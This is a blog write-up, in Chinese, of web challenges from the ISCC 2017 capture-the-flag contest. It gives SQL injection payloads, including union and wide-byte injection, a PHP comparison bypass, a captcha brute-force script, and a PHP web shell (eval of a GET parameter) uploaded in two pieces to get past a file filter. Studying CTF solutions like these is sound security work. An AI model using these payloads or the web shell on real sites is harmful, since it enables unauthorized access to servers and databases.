ISCC_2017_Web_writeup

× 文章目录
  1. 1. Web签到题,来和我换flag啊!
  2. 2. WelcomeToMySQL
  3. 3. where is your flag
  4. 4. 我们一起来日站
  5. 5. 自相矛盾
  6. 6. Simple sqli
  7. 7. I have a jpg,i upload a txt.

Web签到题,来和我换flag啊!

POST提交三个f1ag,可在response中拿到flag。

WelcomeToMySQL

F12发现数据库信息在../base.php。上传php5

1
2
3
<?php
show_source("../base.php");
?>

访问upload/xxx.php可拿到base.php源码。
再上传一个php5连接数据库可拿到flag。

1
2
3
4
5
6
<?php
$conn = mysql_connect("localhost", "iscc2017", "iscc2017");
mysql_select_db("flag",$conn);
$result = mysql_query("select * from flag");
var_dump(mysql_fetch_row($result));
?>

where is your flag

访问flag.php发现hint:thisisflag。可知在表flag中有字段名为thisisflag。尝试GET请求id=1,页面返回正常;请求id=2-1,返回空白页面,可猜测,sql语句为

1
SELECT * FROM foobar where id='$_GET['id']'

测试可知为宽字节注入,且需要转换编码为gbk:

我们一起来日站

尝试访问robots.txt,发现Disallow: /21232f297a57a5a743894a0e4a801fc3/,提示keep finding admin page,访问/admin.php进入后台登录界面。简单注入:username为admin,passwd为'or 1#拿到flag。

自相矛盾

F12拿到部分源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
$v1=0;$v2=0;$v3=0;
$a=(array)json_decode(@$_GET['iscc']); 
if(is_array($a)){
    is_numeric(@$a["bar1"])?die("nope"):NULL;
    if(@$a["bar1"]){
        ($a["bar1"]>2016)?$v1=1:NULL;
    }
    if(is_array(@$a["bar2"])){
        if(count($a["bar2"])!==5 OR !is_array($a["bar2"][0])) die("nope");
        $pos = array_search("nudt", $a["bar2"]);
        $pos===false?die("nope"):NULL;
        foreach($a["bar2"] as $key=>$val){
            $val==="nudt"?die("nope"):NULL;
        }
        $v2=1;
    }	
}
$c=@$_GET['cat'];
$d=@$_GET['dog'];
if(@$c[1]){
    if(!strcmp($c[1],$d) && $c[1]!==$d){
		
        eregi("3|1|c",$d.$c[0])?die("nope"):NULL;
        strpos(($c[0].$d), "isccctf2017")?$v3=1:NULL;
		
    }
	
}
if($v1 && $v2 && $v3){ 
   
   echo $flag;
}

其中$v2中的array_search()绕过参考了某个大佬的博客:array_search()绕过。$v3中正则的绕过采用%00截断。

Simple sqli

验证码要求md5加密后前三位等于一个随机字符串,于是可以写个脚本爆破出符合要求的验证码:

1
2
3
4
5
6
7
8
9
#python3.6
import hashlib
sub = "随机字符串"
for i in range(100000):
    if hashlib.md5(str(i).encode('utf8')).hexdigest().startswith(sub):
    	print(i)
    	break

测试发现,当Username为admin' or 1#时显示password error. 输入不存在的Username或者sql语法错误时显示username error. 输入'union select 1亦显示password error. 可以猜测sql语句为:

1
SELECT password FROM foobar WHERE username=''

然后将查询结果与用户输入的md5加密后的password进行比较。

于是可以令Username=' union select md5(1)#,Password=1,即可拿到Flag。

I have a jpg,i upload a txt.

题目过滤了php标签和script标签。当传入$do=rename时,调用了一个KaIsA()函数,测试后发现大写字母为ascii+6,小写为ascii-6,函数代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#python3.6
a = 'base64加密后的字符串'
b = ''
for i in a:
	if i.isupper():
		i = ord(i)+6
		if i>90:
			i = chr(i-26)
		else:
			i = chr(i)
	elif i.islower():
		i = ord(i)-6
		if i<97:
			i = chr(i+26)
		else:
			i = chr(i)
	b += i
	
print(b)

观察源码发现,rename过程中新生成的随机文件名的txt是唯一的,因此可以尝试上传两个使用php短标签的文件,拼成一个txt文件,再更改后缀为php。

上传的两个文件分别为:

1
2
3
<     //1.txt
? eval($_GET['a']); ?>     //2.txt

经过两次的rename过程,可以得到一个随机文件名的php,访问upload/xxxxxx.php会跳转到flaggalf.php,抓包可得flag

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家